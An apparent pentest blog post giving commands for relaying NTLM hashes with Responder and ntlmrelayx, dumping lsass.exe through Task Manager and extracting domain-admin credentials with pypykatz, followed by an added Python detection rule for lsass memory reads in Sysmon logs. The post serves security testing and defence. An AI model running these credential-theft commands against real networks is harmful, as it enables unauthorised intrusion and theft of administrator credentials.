Jul 15, 2020
This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:
Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven! Take a list of targets like this:
smb://CORP\Administrator@192.168.195.2
smb://CORP\Administrator@192.168.195.3
smb://CORP\brian.admin@192.168.195.7
192.168.195.7
192.168.195.10
Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active SOCKS connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin
I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working, so I ended up trying the binary version and then it worked like a champ!
Looking to dump lsass a "clean" way? Try RDPing directly into the victim machine, opening taskmgr.exe, clicking the Details tab, then right-clicking lsass.exe and choosing Create dump file, and bam, done.
Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share
Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:
pip3 install pypykatz
sudo pypykatz lsa minidump lsass.dmp > lsass.txt
Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to munch on!
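On the blue-team side, the Task Manager "Create dump file" trick above is exactly the kind of lsass access that Sysmon Event ID 10 (ProcessAccess) records. The following is an added detection example (not code from the original post or from any of the tools it mentions) that flags lsass memory reads from non-allowlisted processes; the allowlist, the access-mask heuristic and the sample records are assumptions constructed for this example.

```python
# Added example: detect lsass.exe memory reads (e.g. taskmgr.exe "Create dump
# file") in Sysmon Event ID 10 records. Allowlist and mask are assumptions.

# PROCESS_VM_READ (0x0010) and PROCESS_QUERY_INFORMATION (0x0400) are the
# rights a dumper needs to read another process's memory (assumed heuristic).
MEMORY_READ_MASK = 0x0010 | 0x0400

# Assumption: processes expected to open lsass.exe on this host image.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def is_lsass_dump_candidate(event: dict) -> bool:
    """True when an EID 10 record shows a memory-read handle to lsass.exe
    opened by a process that is not on the allowlist."""
    if event.get("EventID") != 10:
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return False
    source = event.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return False
    # Sysmon renders GrantedAccess as a hex string such as "0x1FFFFF".
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    return granted & MEMORY_READ_MASK == MEMORY_READ_MASK


def scan(events):
    """Return (SourceImage, User) for every record that should be alerted on."""
    return [(e["SourceImage"], e.get("User", "?"))
            for e in events if is_lsass_dump_candidate(e)]


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "User": "CORP\\brian.admin"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Windows\System32\Taskmgr.exe"},
]

if __name__ == "__main__":
    for src, user in scan(SAMPLE_EVENTS):
        print(f"ALERT: {src} opened lsass.exe for memory read as {user}")
```

Only the Task Manager record trips the rule: csrss.exe is allowlisted, the svchost.exe record only holds PROCESS_QUERY_LIMITED_INFORMATION (0x1000), and the EID 1 record is not a ProcessAccess event at all.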